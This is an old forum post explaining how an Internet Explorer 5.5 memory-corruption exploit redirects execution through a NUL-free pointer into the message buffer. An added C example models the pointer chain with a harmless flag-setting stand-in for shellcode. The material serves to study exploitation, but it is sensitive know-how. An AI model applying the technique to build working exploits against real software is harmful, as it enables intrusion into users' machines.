Behrooz_Ice
12-28-2003, 01:10 PM
(The exploit code will not work straight out of the "box")
Message (buffer) starts at 0006F578 (circa)
Message (buffer) ends at 0006F94C (circa)
The problem lies here:
5F26F339 mov ebx,dword ptr [eax]
5F26F354 call dword ptr [ebx+10h]
Now, since we control EAX but cannot provide it with NULLs, we must find somewhere in kernel memory a place that contains the following number (an address in our buffer), for example:
We found 00 06 F5 A4 at 5F1835C7
Windows 2000 SP3 Internet Explorer 5.5
So 5F1835C7 is placed in EAX; that location has the memory content 0006F5A4,
causing our MOV to place the following content in EBX: 00 06 F5 A4.
The final EIP call goes out to 0006F5B4; this is where our arbitrary code lies.
Compiled by Ashiyane Security Team
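The pointer chain the post walks through, as an added example in C that is not part of the original post or the Ashiyane code. It models the two instructions (`mov ebx,[eax]` / `call [ebx+10h]`) with EAX under attacker control, the NUL-byte constraint on the value placed in EAX, and the search for a dword inside a loaded module that happens to hold an address within the message buffer. The addresses 5F1835C7 and 0006F5A4 are the post's; the module bytes around them, the function names and the flag-setting `payload` that stands in for shellcode are constructed here.

```c
/*
 * Added example (not code from the original post): a C model of
 *     mov  ebx, dword ptr [eax]
 *     call dword ptr [ebx+10h]
 * with EAX attacker-controlled, plus the search for a NUL-free module
 * address holding a pointer into the message buffer.  Addresses follow the
 * post; the module bytes and the payload are constructed stand-ins.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* The post's constraint: the dword we put in EAX cannot contain a 0x00 byte. */
int nul_free32(uint32_t v)
{
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xffu) == 0)
            return 0;
    return 1;
}

/* Scan a module image mapped at `base` for a little-endian dword equal to
 * `wanted` (an address inside our buffer).  Returns the virtual address of
 * the first NUL-free hit, or 0 if there is none. */
uint32_t find_ptr_to(const uint8_t *img, size_t len, uint32_t base, uint32_t wanted)
{
    for (size_t off = 0; off + 4 <= len; off++) {
        uint32_t v = (uint32_t)img[off]
                   | (uint32_t)img[off + 1] << 8
                   | (uint32_t)img[off + 2] << 16
                   | (uint32_t)img[off + 3] << 24;
        uint32_t va = base + (uint32_t)off;
        if (v == wanted && nul_free32(va))
            return va;
    }
    return 0;
}

/* Constructed 16-byte slice, assumed mapped at 0x5F1835C0, with the dword
 * 0x0006F5A4 planted at offset 7 so the hit lands at 0x5F1835C7 as in the post. */
uint32_t demo_search(void)
{
    static const uint8_t img[16] = {
        0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x83, 0xEC,     /* filler */
        0xA4, 0xF5, 0x06, 0x00,                       /* 0x0006F5A4, little-endian */
        0x90, 0x90, 0x90, 0x90, 0x90 };
    return find_ptr_to(img, sizeof img, 0x5F1835C0u, 0x0006F5A4u);
}

/* Where the CALL reads its target from: [ebx+10h]. */
uint32_t call_slot(uint32_t ebx)
{
    return ebx + 0x10u;
}

/* ---- the dispatch itself, run with real pointers in this process ---- */

static int payload_ran = 0;
static void payload(void) { payload_ran = 1; }   /* stands in for shellcode */

/* Our message buffer: the function pointer at +0x10 is what [ebx+10h] fetches. */
typedef struct {
    uint8_t pad[0x10];
    void (*slot)(void);
} fake_message;

/* The vulnerable sequence with EAX fully attacker-controlled. */
void vulnerable_dispatch(uintptr_t eax)
{
    uintptr_t ebx = *(uintptr_t *)eax;                 /* mov  ebx, [eax] */
    void (*fn)(void) = *(void (**)(void))(ebx + 0x10); /* call [ebx+10h]  */
    fn();
}

/* Returns 1 if pointing EAX at a module dword that holds our buffer's
 * address ends with control reaching the payload. */
int run_chain(void)
{
    static fake_message msg;        /* "our buffer" */
    static uintptr_t module_dword;  /* the dword inside the module that points at it */
    msg.slot = payload;
    module_dword = (uintptr_t)&msg;
    payload_ran = 0;
    vulnerable_dispatch((uintptr_t)&module_dword);  /* EAX = 5F1835C7 in the post */
    return payload_ran;
}

int main(void)
{
    uint32_t eax = demo_search();
    uint32_t ebx = 0x0006F5A4u;
    printf("EAX = %08X (NUL-free: %d) -> EBX = %08X -> call [%08X]\n",
           eax, nul_free32(eax), ebx, call_slot(ebx));
    printf("buffer address NUL-free: %d, payload reached: %d\n",
           nul_free32(ebx), run_chain());
    return 0;
}
```

The first half uses the post's 32-bit values to show why the indirection is needed: the buffer address 0006F5A4 has a leading zero byte and cannot be placed in EAX directly, while 5F1835C7 can, and it is the module's own contents that supply the buffer address. The second half runs the same two-step dereference with native pointers, so the +10h adjustment is visible as the CALL reading its target through the dword at buffer+0x10 (0006F5B4 in the post's numbers).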
